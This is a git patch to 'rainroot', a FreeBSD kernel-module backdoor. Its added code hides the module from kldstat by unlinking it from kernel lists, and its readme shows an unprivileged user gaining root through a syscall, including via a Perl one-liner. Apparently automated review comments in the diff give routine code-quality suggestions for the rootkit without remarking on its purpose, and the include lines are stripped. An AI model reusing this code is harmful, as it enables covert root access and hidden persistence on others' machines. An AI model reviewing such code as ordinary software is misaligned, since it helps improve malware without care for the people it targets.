From 0fc9a7e995a3100939bb27c28758b8e01b58a7d3 Mon Sep 17 00:00:00 2001
From: your-favorite-hacker
Date: Sun, 5 Jul 2015 21:24:41 +0200
Subject: [PATCH] version 0.2, added hidefunction so mod is not found anymore easily

---
 rainroot/Makefile | 4 +--
 rainroot/caller.c | 11 +++++++
 rainroot/rainroot.c | 78 +++++++++++++++++++++++++++++++++++++--------
 rainroot/readme.txt | 37 ++++++++++++++++++---
 4 files changed, 111 insertions(+), 19 deletions(-)

diff --git a/rainroot/Makefile b/rainroot/Makefile
index ac9b2fc..e96bd5a 100755
--- a/rainroot/Makefile
+++ b/rainroot/Makefile
@@ -2,7 +2,7 @@
 # $FreeBSD: src/share/examples/kld/syscall/module/Makefile,v 1.2 2001/09/18 12:03:42 ru Exp $
 KMOD= rainroot
-SRCS= vnode_if.h\
- rainroot.c
+SRCS= rainroot.c
+
 .include
diff --git a/rainroot/caller.c b/rainroot/caller.c
index f4a33f9..230dc1a 100644
--- a/rainroot/caller.c
+++ b/rainroot/caller.c
@@ -4,9 +4,20 @@
 #include
 #include
+void help(){
+ printf("rainroot caller\nuse appropiate syscallnumber (default: 210)\nexample: ./caller 210\n\nby dash\n");
+
+
+}
+
 int main(int argc, char *argv[]){
 int scall=-1;
+ if(argc<2){
+ help();
+ exit(1);
+ }
+
 scall = atoi(argv[1]);
 syscall(scall);
diff --git a/rainroot/rainroot.c b/rainroot/rainroot.c
index 7386982..6ee901f 100755
--- a/rainroot/rainroot.c
+++ b/rainroot/rainroot.c
@@ -2,6 +2,10 @@
 instant r00t :)
 ancient code, time to publish
 by -
+
+ added code for hiding the module
+ basic hide code was built some years back during reading
+ BSD Rootkits by Joseph Kong, it is quite nice have a look!
 */
 #include
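Review bot: `void help(){` declares a function with an unspecified parameter list rather than none; in C the prototype should be `void help(void){` so a call with arguments is rejected at compile time. The user-facing string in that function misspells "appropriate" as "appropiate", and the readme hunk repeats the typo in its sample output. The new `argc<2` guard only covers a missing argument: `atoi(argv[1])` returns 0 for non-numeric input without reporting it, so `strtol` with an end-pointer check would be the usual way to reject bad input. `main` continues outside the hunk, and the include targets on the first two context lines have been lost by the rendering.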
@@ -15,7 +19,37 @@
 #include
 #include
 #include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define HIDEMOD "rainroot.ko"
+#define HIDE "rainroot"
+
+extern linker_file_list_t linker_files;
+static struct mtx kld_mtx;
+extern int next_file_id;
+
+typedef TAILQ_HEAD(,module) modulelist_t;
+extern modulelist_t modules;
+extern int nextid;
+
+struct module {
+ TAILQ_ENTRY(module) link;
+ TAILQ_ENTRY(module) flink;
+ struct linker_file *file;
+ int refs;
+ int id;
+ char *name;
+ modeventhand_t handler;
+ void *arg;
+ modspecific_t data;
+};
 /*
 * The function for implementing the syscall.
@@ -41,20 +75,38 @@ static int offset = NO_SYSCALL;
 static int
 load (struct module *module, int cmd, void *arg)
 {
- int error = 0;
+ struct linker_file *lf;
+ struct module *mod;
+ mtx_init(&kld_mtx, "hide lock",NULL,MTX_DEF);
+ mtx_lock(&Giant);
+ mtx_lock(&kld_mtx);
 
- switch (cmd) {
- case MOD_LOAD :
- printf ("call me at %d\n", offset);
- break;
- case MOD_UNLOAD :
- printf ("call me at %d\n", offset);
- break;
- default :
- error = EOPNOTSUPP;
- break;
+ (&linker_files)->tqh_first->refs--;
+
+ TAILQ_FOREACH(lf, &linker_files,link)
+ {
+ if (strcmp(lf->filename,HIDEMOD)==0){
+ next_file_id--;
+ TAILQ_REMOVE(&linker_files,lf,link);
+ break;
+ }
 }
- return error;
-}
+ mtx_unlock(&kld_mtx);
+ mtx_unlock(&Giant);
+
+ sx_xlock(&modules_sx);
+
+ TAILQ_FOREACH(mod, &modules, link){
+ if(strcmp(mod->name,HIDE)==0){
+ nextid--;
+ TAILQ_REMOVE(&modules,mod,link);
+ break;
+ }
+ }
+
+ sx_unlock(&modules_sx);
+
+ return(0);
+}
 
 SYSCALL_MODULE(syscall, &offset, &gimme_rude_sysent, load, NULL);
diff --git a/rainroot/readme.txt b/rainroot/readme.txt
index a747589..a5270dd 100644
--- a/rainroot/readme.txt
+++ b/rainroot/readme.txt
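Review bot: The `struct module` definition added in this hunk appears to be a hand copy of a layout the kernel does not publish in its headers, and the `mod->name` comparison in the next hunk is only meaningful while every field offset matches the running kernel exactly. That dependency is undocumented; a comment such as `/* hand-copied layout of the kernel's private struct module; not a stable ABI, re-check field order against the target kernel source on every kernel update */` above the struct would make the fragility explicit. Likewise `static struct mtx kld_mtx;` declares a fresh, file-local mutex that merely shares a name with a kernel lock, which a reader could easily mistake for the real one; a one-line comment saying it is local to this file would prevent that. The `#include` targets in this hunk have been stripped by the rendering, so which headers the new declarations rely on cannot be checked here.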
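Review bot: `load` no longer looks at `cmd`, so `mtx_init(&kld_mtx, ...)` and both list walks run on every module event delivered to this handler, whereas the removed `switch` distinguished MOD_LOAD from MOD_UNLOAD and returned EOPNOTSUPP for anything else. Initialising the same mutex again on a later event and re-walking lists whose entry was already unlinked is likely to trip kernel assertions, and `(&linker_files)->tqh_first->refs--` decrements the reference count of whatever entry heads the list without confirming it is the intended one — the readme's kldstat output shows the kernel itself in that position. At minimum the unconditional behaviour should be stated, e.g. `/* module event handler: executed for every cmd value, cmd is not inspected */` at the top of the body, and the lock taken via `mtx_lock(&kld_mtx)` is the file-local mutex from the previous hunk, not a kernel lock, so the pair excludes nothing beyond this module.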
@@ -1,29 +1,58 @@
 rainr00t
 ========
-instant root-priv backd00r via kernelland anyone?
+instant root-priv backd00r via kernelland anyone? get root and hide the module.
 well this module, once loaded gives the thread/user calling instantly root, without spawning an extra shell or alike.
+new feature in version 0.2
+--------------------------
+
+automaticly hiding the loaded module, be aware that you cant easily unload it now ;)
+
 usage
 -----
+kernel
+******
 root@crashb0x:~/gainroot # uname -a
 FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
 root@crashb0x:~/gainroot # kldload ./rainroot.ko
-
 root@crashb0x:~/gainroot # kldstat
 Id Refs Address Size Name
 1 3 0xffffffff80200000 1755658 kernel
- 3 1 0xffffffff81a12000 20e rainroot.ko
-# userland tool, to call the newly loaded syscall (normally its syscall 210)
+No rainroot in kldstat, just the default kernel.
+
+userland
+********
+
+# userland tool, to call the newly loaded syscall (normally its syscall 210, depending if you got extra syscalls on your box already)
 In this examples it is syscall nr 211.
+
+compile it
 l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller
+
+test for help
+# ./caller
+rainroot caller
+use appropiate syscallnumber (default: 210)
+example: ./caller 210
+
+execute and get root
 l00ser@crashb0x:/tmp % ./caller 211
 l00ser@crashb0x:/tmp % id
 uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
+besides the caller you could also go with every language or operation requesting the syscall. for instance
+ this perl one-liner:
+
+l00ser@crashb0x:~ % id
+uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser)
+l00ser@crashb0x:~ % perl -e 'syscall(211);'
+l00ser@crashb0x:~ % id
+uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
+
 author
 ------
 dash